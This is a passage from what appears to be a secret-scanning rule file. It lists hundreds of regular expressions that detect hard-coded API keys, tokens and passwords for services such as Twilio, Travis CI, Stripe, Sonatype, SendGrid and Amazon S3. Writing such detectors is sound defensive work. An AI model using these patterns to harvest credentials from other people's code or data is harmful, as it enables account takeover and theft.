"(?i)[\"']?twilio[_-]?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?trex[_-]?okta[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?trex[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?secure[_-]?env[_-]?vars[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?pull[_-]?request[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?e2e[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?com[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?branch[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?token[_-]?core[_-]?java[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?thera[_-]?oss[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?tester[_-]?keys[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?test[_-]?test[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?test[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?tesco[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?svn[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?surge[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?surge[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stripe[_-]?public[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stripe[_-]?private[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?strip[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?strip[_-]?publishable[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?starship[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?starship[_-]?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?location[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?staging[_-]?base[_-]?url[_-]?runscope[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ssmtp[_-]?config[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sshpass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?srcclr[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?square[_-]?reader[_-]?sdk[_-]?repository[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sqssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sqsaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spring[_-]?mail[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spotify[_-]?api[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spotify[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spaces[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spaces[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?soundcloud[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?soundcloud[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?token[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?token[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?gpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?gpg[_-]?key[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonar[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonar[_-]?project[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonar[_-]?organization[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?socrata[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?socrata[_-]?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snyk[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snyk[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snoowrap[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snoowrap[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snoowrap[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?slate[_-]?user[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?slash[_-]?developer[_-]?space[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?slash[_-]?developer[_-]?space[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?setsecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?setdstsecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?setdstaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ses[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ses[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?service[_-]?account[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?endpoint[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?default[_-]?org[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendwithus[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?selion[_-]?selenium[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?selion[_-]?log[_-]?level[_-]?dev[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?segment[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?key[_-]?base[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?9[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?8[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?7[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?6[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?5[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?4[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?11[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?10[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?0[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sdr[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?scrutinizer[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sauce[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sandbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sandbox[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sacloud[_-]?api[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sacloud[_-]?access[_-]?token[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sacloud[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?user[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?secret[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?secret[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?key[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?key[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rubygems[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rtd[_-]?store[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rtd[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?route53[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ropsten[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rinkeby[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rest[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?repotoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?reporting[_-]?webdav[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?reporting[_-]?webdav[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?release[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?release[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?registry[_-]?secure[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?registry[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rediscloud[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?redis[_-]?stunnel[_-]?urls[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?randrmusicapiaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rabbitmq[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?quip[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?qiita[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pypi[_-]?passowrd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pushover[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?publish[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?publish[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?publish[_-]?access[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?project[_-]?config[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prod[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prod[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prod[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?private[_-]?signing[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pring[_-]?mail[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?preferred[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prebuild[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgresql[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgresql[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?plugin[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?plotly[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?places[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?places[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pg[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pg[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?personal[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?personal[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?percy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?percy[_-]?project[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?paypal[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?passwordtravis[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?parse[_-]?js[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pagerduty[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?packagecloud[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?jira[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?os[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?os[_-]?auth[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?openwhisk[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?open[_-]?whisk[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?onesignal[_-]?user[_-]?auth[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?onesignal[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?skey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?pubkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?pkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - 